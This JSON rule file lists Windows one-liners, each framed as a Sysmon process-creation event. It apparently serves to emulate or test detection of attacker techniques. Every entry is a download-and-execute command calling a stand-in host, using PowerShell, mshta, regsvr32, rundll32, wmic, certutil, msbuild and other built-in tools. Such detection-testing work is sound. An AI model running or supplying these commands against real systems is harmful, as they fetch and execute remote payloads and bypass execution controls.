{
"name": "Windows oneliners",
"version": "0.1",
"author": "n0dec",
"description": "Windows oneliners to download remote payload and execute arbitrary code. https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/",
"rules": {
"powershell_inline": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Powershell one-line download and execution using the default proxy credentials.",
"payload": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "powershell -exec bypass -c \"(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex\""
}
},
"powershell_webdav": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Powershell download payload directly from a WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "powershell -exec bypass -f \\\\webdavserver\\folder\\payload.ps1"
}
},
"cmd": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Cmd executing batch file from a WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\cmd.exe",
"CommandLine": "cmd.exe /k < \\\\webdavserver\\folder\\batchfile.txt"
}
},
"cscript": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Cscript one-line command to download a payload directly from a WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\cscript.exe",
"CommandLine": "cscript //E:jscript \\\\webdavserver\\folder\\payload.txt"
}
},
"mshta_inline": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Mshta execute inline script downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\mshta.exe",
"CommandLine": "mshta vbscript:Close(Execute(\"GetObject(\"\"script:http://webserver/payload.sct\"\")\"))"
}
},
"mshta_remote": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Mshta execute hta file downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\mshta.exe",
"CommandLine": "mshta http://webserver/payload.hta"
}
},
"mshta_webdav": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Mshta execute hta file downloaded from WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\mshta.exe",
"CommandLine": "mshta \\\\webdavserver\\folder\\payload.hta"
}
},
"rundll32_webdav": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Rundll32 execute dll file downloaded from WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\rundll32.exe",
"CommandLine": "rundll32 \\\\webdavserver\\folder\\payload.dll,entrypoint"
}
},
"rundll32_inline": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Rundll32 execute inline jscript downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\rundll32.exe",
"CommandLine": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\";o=GetObject(\"script:http://webserver/payload.sct\");window.close();"
}
},
"wmic": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "WMIC inline script via XSL file downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
"CommandLine": "wmic os get /format:\"https://webserver/payload.xsl\""
}
},
"regasm": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Regasm execute dll file downloaded from remote WebDAV server.",
"payload": {
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe",
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe /u \\\\webdavserver\\folder\\payload.dll"
}
},
"regsvr32_inline": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Regsvr32 execute inline script downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\regsvr32.exe",
"CommandLine": "regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll"
}
},
"regsvr32_webdav": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Regsvr32 execute inline script downloaded from remote WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\regsvr32.exe",
"CommandLine": "regsvr32 /u /n /s /i:\\\\webdavserver\\folder\\payload.sct scrobj.dll"
}
},
"odbcconf": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Odbcconf execute dll file downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\odbcconf.exe",
"CommandLine": "odbcconf /s /a {regsvr \\\\webdavserver\\folder\\payload_dll.txt}"
}
},
"msbuild": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "MSBuild execute inline code downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe",
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe /noautoresponse /preprocess \\\\webdavserver\\folder\\payload.xml"
}
},
"certutil_download": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Certutil download file from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\certutil.exe",
"CommandLine": "certutil -urlcache -split -f http://webserver/payload payload"
}
},
"certutil_decode": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Certutil decode file and drop it as payload.",
"payload": {
"Image": "C:\\Windows\\System32\\certutil.exe",
"CommandLine": "certutil -decode payload.b64 payload.dll"
}
},
"installutil": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "InstallUtil execute dll file as a payload.",
"payload": {
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe",
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil /logfile= /LogToConsole=false /u payload.dll"
}
}
}
}